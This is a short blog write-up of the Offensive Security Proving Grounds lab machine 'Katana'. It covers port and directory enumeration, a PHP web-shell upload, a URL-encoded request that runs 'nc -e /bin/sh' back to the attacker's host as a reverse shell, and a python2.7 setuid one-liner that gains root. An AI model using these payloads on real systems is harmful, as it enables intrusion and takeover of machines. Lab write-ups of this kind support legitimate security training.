KATANA has been PWNED!!!! — Offensive Security

Neelesh Patel
2 min readOct 1, 2021

--

This is one of the proving ground from Offensive Security and marked as easy machine. So let’s pwn this machine

ENUMERATION

Starting of with scanning with open service and ports

Highlighting all these is a good practice ;-) . So found some ports and numerous http services. So as there are numerous, so using nikto will be my last approach.

Brute forcing web directories on different ports.

gobuster.txt is for port 80

gobuster8088.txt is for port 8088

gobusterdir.txt is for dir brute on port 80

gobusterdir8088.txt is for dir brute on port 8088

And surprisingly I found upload.html and then without furthur ado i used one line php payload and waited for 1 minute as per the web page instructions. During the initial recon there were many http services running, I then hop over to port 8715 with uploaded file location url i.e Suppose the uploaded file name is cmd.php, so the encoded payload will be :

http%3A%2F%2F192.168.100.131%3A8715%2Fkatana_cmd.php%3Fcmd%3Dnc%20-e%20%2Fbin%2Fsh%20192.168.100.128%209999

As my shell was listening on this port and YES!!! we’re in!.

Privilege Escalations

Enumerating the target machine after gaining access, I looked for system capabilities and found empty capability (ep) over suid is given python2.7 for www-data that means all privilege is assigned to www-data for that program, therefore taking advantage of this permission I can escalate into high privilege from low privilege shell using the command below.

python2.7 -c 'import pty;import os;os.setuid(0);pty.spawn("/bin/dash")'

And we are now root!!! and found a flag ;-)

— — — — — — — — — — — — — — — — — — — — — — — -

Let me know if you face any issues

================

That’s all for now,

Until Next Time,

You are Awesome!!!

— — — — — — — — — — — — —

--

--

Neelesh Patel
Neelesh Patel

Written by Neelesh Patel

All I need is just my ten fingers and sometimes {coffee}, to talk to computers.

No responses yet